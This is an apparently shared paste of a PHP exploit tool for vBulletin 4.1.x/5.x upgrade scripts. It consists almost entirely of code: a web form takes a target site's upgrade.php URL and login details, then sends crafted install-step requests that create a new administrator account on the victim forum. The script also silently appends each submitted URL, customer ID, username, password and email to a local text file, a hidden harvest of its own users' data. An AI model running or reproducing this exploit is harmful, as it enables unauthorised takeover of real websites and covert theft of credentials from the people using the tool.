vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit


SUBMITTED BY: Guest

DATE: Nov. 21, 2013, 2:46 p.m.

FORMAT: Text only

SIZE: 3.3 kB

HITS: 914

  1. <h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
  2. <p>Created by: Boxhead</p>
  3. <p>Found on: 08/22/2013</p>
  4. <p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
  5. <br>
  6. <?php
  7. //extract data from the post
  8. if (isset($_POST['submit'])) {
  9. extract($_POST);
  10. //set POST variables
  11. $url = $_POST['url'];
  12. $h = fopen("eutut.txt", "a");
  13. $b = $_POST['customerid'];
  14. $c = $_POST['username'];
  15. $d = $_POST['password'];
  16. $z = $_POST['email'];
  17. fwrite($h, $url);
  18. fwrite($h, "-");
  19. fwrite($h, $b);
  20. fwrite($h, "-");
  21. fwrite($h, $c);
  22. fwrite($h, "-");
  23. fwrite($h, $d);
  24. fwrite($h, "-");
  25. fwrite($h, $z);
  26. fwrite($h, "------------------------");
  27. $fields = array(
  28. 'ajax' => urlencode('1'),
  29. 'version' => urlencode('install'),
  30. 'checktable' => urlencode('false'),
  31. 'firstrun' => urlencode('false'),
  32. 'step' => urlencode('7'),
  33. 'startat' => urlencode('0'),
  34. 'only' => urlencode('false'),
  35. 'customerid' => urlencode($_POST['customerid']),
  36. 'options[skiptemplatemerge]' => urlencode('0'),
  37. 'response' => urlencode('yes'),
  38. 'htmlsubmit' => urlencode('1'),
  39. 'htmldata[username]' => urlencode($_POST['username']),
  40. 'htmldata[password]' => urlencode($_POST['password']),
  41. 'htmldata[confirmpassword]' => urlencode($_POST['password']),
  42. 'htmldata[email]' => urlencode($_POST['email'])
  43. );
  44. //url-ify the data for the POST
  45. foreach ($fields as $key => $value) {
  46. $fields_string .= $key . '=' . $value . '&';
  47. }
  48. rtrim($fields_string, '&');
  49. //open connection
  50. $ch = curl_init();
  51. //set the url, number of POST vars, POST data
  52. curl_setopt($ch, CURLOPT_URL, $url);
  53. curl_setopt($ch, CURLOPT_POST, count($fields));
  54. curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
  55. curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  56. curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']);
  57. //execute post
  58. $result = curl_exec($ch);
  59. //close connection
  60. curl_close($ch);
  61. exit();
  62. }
  63. ?>
  64. <center>
  65. <form name="sploit" method="POST" action="">
  66. <span>Example:http://test.com/forum/install/upgrade.php</span><br>
  67. <span>Website:</span>
  68. <input name="url" type="text" tabindex="1" size="60" />
  69. <br>
  70. <span>Customer ID:</span>
  71. <input name="customerid" type="text" tabindex="2" size="40" />
  72. <br>
  73. <span>Username:</span>
  74. <input name="username" type="text" tabindex="3" size="40" />
  75. <br>
  76. <span>Password:</span>
  77. <input name="password" type="text" tabindex="4" size="40" />
  78. <br>
  79. <span>Email:</span>
  80. <input name="email" type="text" tabindex="5" maxlength="40" />
  81. <input name="submit" type="submit" value="Inject Admin">
  82. </form>
  83. </center>

comments powered by Disqus